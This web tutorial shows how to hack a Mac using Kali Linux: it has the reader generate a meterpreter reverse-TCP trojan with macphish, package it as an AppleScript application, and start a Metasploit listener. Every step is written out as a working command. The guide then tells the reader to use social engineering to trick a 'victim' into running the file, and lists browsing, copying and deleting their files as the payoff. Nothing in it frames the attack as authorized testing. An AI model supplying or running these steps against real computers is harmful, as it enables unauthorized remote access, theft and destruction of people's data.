Note: If you do not have Kali Linux, you can buy a pre-made ready to boot USB with Kali Linux on it from here (Amazon). Any sales will support our content creators.
We are a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for us to earn fees by linking to Amazon.com and affiliated sites.
In this tutorial, we will be using Kali Linux to hack into a mac computer.
A quick preview at what we’ll be doing:
- Download macphish – a program that will allow us to create custom applescripts that open up a backdoor on the victim’s computer.
- Choose a payload from metasploit – for macphish to work, we need to give it a payload to run. We need to use a python-based payload, but metasploit has a lot of those.
- Generate a payload in macphish – once we give it the parameters, macphish will do all the hard work and create an applescript.
- Create an application that will run the script – using mac’s script editor, we can paste our applescript into the script editor and create a file that will run our script.
- Start a meterpreter session – creating a backdoor does nothing if we don’t have the key for it. With metasploit, we can create our key in the form of meterpreter, allowing us to access the computer.
- Send the file to the victim and wait for him to click on it – with a bit of social engineering, we can trick the victim into running our trojan file
Step 1: Download macphish
Macphish is a tool that automatically generates applescripts that will allow you to gain remote access to a computer. By giving macphish an IP address, a listening port, a payload, and a trojan type, we can generate an applescript that will run create a backdoor. We need to start by downloading macphish from GitHub. Type
git clone https://github.com/cldrn/macphish.git
to download the macphish tool.
Now we want to enter the macphish directory and see the files. Type in
cd macphish ls
to see the files that are listed. To start up the tool and see the options, we can type in
If we scroll down to the bottom, we can see the options listed. We can spawn 4 different types of trojans (also known as payloads): beacon, creds, meterpreter, and meterpreter-grant. We will be using meterpreter in this tutorial.
Step 2: Choose a payload to use from metasploit
Before we create a payload, we need to choose a meterpreter payload. Open a new terminal window and check meterpreter payloads by typing in
msfvenom -l payloads
Due to the nature of macphish, we are limited to using only python-based payloads, but that is by no means a bad thing.
For this article, we will be using python/meterpreter/reverse_tcp, but you can choose any payload that you want. Just make sure that it has “python” at the beginning of its name.
Step 3: Generate the applescript in macphish
Now that we’ve chosen our payload, we can move back to our macphish window and type in
./macphish.py -lh [your IP address] -lp 4444 -p python/meterpreter/reverse_tcp -a meterpreter
This will allow macphish to generate a custom payload that can run silently on a mac.
Now that we have our shell script, we need a mac computer to do the rest of the hack. Create a text file to save the payload using nano or vim, then email the file to yourself so you can access it on another computer. We are going to need to use a mac for the next part of this hack.
Step 4: Create an applescript and export it as an application
On your mac, open up the script editor from the utilities folder.
Paste the script into the folder and export the script as an application file.
This will create an application file (mac equivalent of an exe file) on the desktop. If we run it though, nothing will happen. We’re going to fix that by going back into Kali Linux and starting a meterpreter session.
Step 5: Start the meterpreter session
Back in Kali Linux, start up metasploit by opening up a new window and typing in
After this, we will set the exploit and necessary parameters and start the listener by typing
use exploit/multi/handler set payload python/meterpreter/reverse_tcp set lhost [your IP address] set lport 4444 run
Step 6: Wait for the victim to click on the file
Once the victim clicks on the file, a meterpreter session will be opened.
We can type in
to see the list of commands available to us.
From here, we can go look through, copy, and delete the victim’s files, execute commands, and play audio files. When we’re done, we can type
to exit the session.
- We used macphish while on Kali Linux to generate an applescript that will open up a malicious backdoor. (If you don’t have access to Kali Linux, you can buy it through amazon here.
- We transported the applescript code to a mac, allowing us to create an application file that will run on the victim’s computer.
- We opened a meterpreter session on Kali Linux that the mac will connect to once the trojan is run. This allows us complete access to the computer and its systems.